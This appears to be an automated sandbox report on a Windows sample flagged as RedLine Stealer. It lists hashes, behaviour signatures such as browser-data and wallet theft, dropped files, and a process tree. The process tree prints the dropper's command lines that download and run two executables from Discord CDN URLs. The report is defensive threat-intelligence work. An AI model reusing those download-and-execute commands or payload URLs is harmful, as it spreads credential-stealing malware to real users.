Analysis

  • max time kernel
    110s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    25-10-2021 13:25

General

  • Target

    081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe

  • Size

    449KB

  • MD5

    41965b4c7cd98b3f504a6273c097e599

  • SHA1

    b3d88c8e7061bb5efae86e9b473e57dcd5cf2333

  • SHA256

    081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254

  • SHA512

    7bd1ce8b1d08ace60d3652a8899e8bb087ba411f552bfed884ea49976cf1f27858f8625d064138d61fb8d6b5089b4372d2fad5be109fa3484a136acdf47e1719

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe
    "C:\Users\Admin\AppData\Local\Temp\081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4280
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\9D8B.bat C:\Users\Admin\AppData\Local\Temp\081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4024
      • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:3988
      • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902178779198279712/902179114025386015/18.exe" "18.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4056
      • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902178779198279712/902179166525460510/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4316
      • C:\Users\Admin\AppData\Local\Temp\24091\18.exe
        18.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4632
      • C:\Users\Admin\AppData\Local\Temp\24091\Transmissibility.exe
        Transmissibility.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4624
      • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "" "" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4640

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\24091\18.exe
    MD5

    c6a841a21a23a82c28f743bc6710ad32

    SHA1

    cbea54744a5bcb7f387499fc5bfe87359da53457

    SHA256

    99ebdf54c2a6705f6c1cc055e4f0eba0be71eab09acb3ecd71fe5923143047cf

    SHA512

    71e2637a07c340551461eb261eb173e2473095e98e420b1c99aea5a6906f2b1e97bd7441667977eb79dbdf60aa728cb46f17cf778cabf453c2a2f7b173d1ee72

  • C:\Users\Admin\AppData\Local\Temp\24091\18.exe
    MD5

    c6a841a21a23a82c28f743bc6710ad32

    SHA1

    cbea54744a5bcb7f387499fc5bfe87359da53457

    SHA256

    99ebdf54c2a6705f6c1cc055e4f0eba0be71eab09acb3ecd71fe5923143047cf

    SHA512

    71e2637a07c340551461eb261eb173e2473095e98e420b1c99aea5a6906f2b1e97bd7441667977eb79dbdf60aa728cb46f17cf778cabf453c2a2f7b173d1ee72

  • C:\Users\Admin\AppData\Local\Temp\24091\Transmissibility.exe
    MD5

    ee7b54950381499d349cc3d50d2bdc0d

    SHA1

    bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

    SHA256

    622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

    SHA512

    86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

  • C:\Users\Admin\AppData\Local\Temp\24091\Transmissibility.exe
    MD5

    ee7b54950381499d349cc3d50d2bdc0d

    SHA1

    bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

    SHA256

    622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

    SHA512

    86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

  • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\9D8B.bat
    MD5

    2235e6ea5a6c35623fa12dc38e494197

    SHA1

    c96a3c512ac498caa303613277c2b256409ca0b9

    SHA256

    441a3049faedf0e8e669eac0964f6a1855c683cca67ed271946014f72e70ceba

    SHA512

    a61cc726413877382b235e9f9d32fa3eed8bc6cd890ffbd37e5dab8e0b79fa3999fb6569da09b9e01f2ae461712a0cecc01bdf8bb0776d9550441bdfa6af8969

  • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
    MD5

    b019efc4814c7a73b1413a335be1fa13

    SHA1

    6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

    SHA256

    a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

    SHA512

    d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

  • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
    MD5

    b019efc4814c7a73b1413a335be1fa13

    SHA1

    6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

    SHA256

    a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

    SHA512

    d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

  • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
    MD5

    b019efc4814c7a73b1413a335be1fa13

    SHA1

    6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

    SHA256

    a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

    SHA512

    d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

  • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
    MD5

    b019efc4814c7a73b1413a335be1fa13

    SHA1

    6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

    SHA256

    a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

    SHA512

    d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

  • C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
    MD5

    b019efc4814c7a73b1413a335be1fa13

    SHA1

    6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

    SHA256

    a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

    SHA512

    d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

  • memory/3988-117-0x0000000000000000-mapping.dmp
  • memory/4024-115-0x0000000000000000-mapping.dmp
  • memory/4056-120-0x0000000000000000-mapping.dmp
  • memory/4316-122-0x0000000000000000-mapping.dmp
  • memory/4624-143-0x0000018640910000-0x0000018640C3C000-memory.dmp
    Filesize

    3.2MB

  • memory/4624-158-0x0000018644040000-0x0000018644041000-memory.dmp
    Filesize

    4KB

  • memory/4624-132-0x0000018625F70000-0x0000018625F71000-memory.dmp
    Filesize

    4KB

  • memory/4624-126-0x0000000000000000-mapping.dmp
  • memory/4624-157-0x0000018643910000-0x0000018643B6C000-memory.dmp
    Filesize

    2.4MB

  • memory/4624-156-0x0000018641F40000-0x0000018642260000-memory.dmp
    Filesize

    3.1MB

  • memory/4624-159-0x0000018640830000-0x0000018640831000-memory.dmp
    Filesize

    4KB

  • memory/4624-155-0x00000186408D5000-0x00000186408D7000-memory.dmp
    Filesize

    8KB

  • memory/4624-146-0x00000186408D4000-0x00000186408D5000-memory.dmp
    Filesize

    4KB

  • memory/4624-145-0x00000186408D2000-0x00000186408D4000-memory.dmp
    Filesize

    8KB

  • memory/4624-144-0x00000186408D0000-0x00000186408D2000-memory.dmp
    Filesize

    8KB

  • memory/4632-137-0x0000000005A90000-0x0000000005A91000-memory.dmp
    Filesize

    4KB

  • memory/4632-151-0x0000000006C80000-0x0000000006C81000-memory.dmp
    Filesize

    4KB

  • memory/4632-141-0x00000000054E0000-0x00000000054E1000-memory.dmp
    Filesize

    4KB

  • memory/4632-139-0x0000000002DB0000-0x0000000002DB1000-memory.dmp
    Filesize

    4KB

  • memory/4632-140-0x00000000055B0000-0x00000000055B1000-memory.dmp
    Filesize

    4KB

  • memory/4632-147-0x00000000065A0000-0x00000000065A1000-memory.dmp
    Filesize

    4KB

  • memory/4632-148-0x0000000005820000-0x0000000005821000-memory.dmp
    Filesize

    4KB

  • memory/4632-149-0x0000000006420000-0x0000000006421000-memory.dmp
    Filesize

    4KB

  • memory/4632-150-0x0000000006AA0000-0x0000000006AA1000-memory.dmp
    Filesize

    4KB

  • memory/4632-142-0x0000000005540000-0x0000000005541000-memory.dmp
    Filesize

    4KB

  • memory/4632-152-0x00000000070D0000-0x00000000070D1000-memory.dmp
    Filesize

    4KB

  • memory/4632-153-0x0000000007E30000-0x0000000007E31000-memory.dmp
    Filesize

    4KB

  • memory/4632-154-0x00000000072F0000-0x00000000072F1000-memory.dmp
    Filesize

    4KB

  • memory/4632-138-0x0000000005480000-0x0000000005481000-memory.dmp
    Filesize

    4KB

  • memory/4632-136-0x0000000002DA0000-0x0000000002DA1000-memory.dmp
    Filesize

    4KB

  • memory/4632-134-0x0000000000C20000-0x0000000000C21000-memory.dmp
    Filesize

    4KB

  • memory/4632-124-0x0000000000000000-mapping.dmp
  • memory/4640-128-0x0000000000000000-mapping.dmp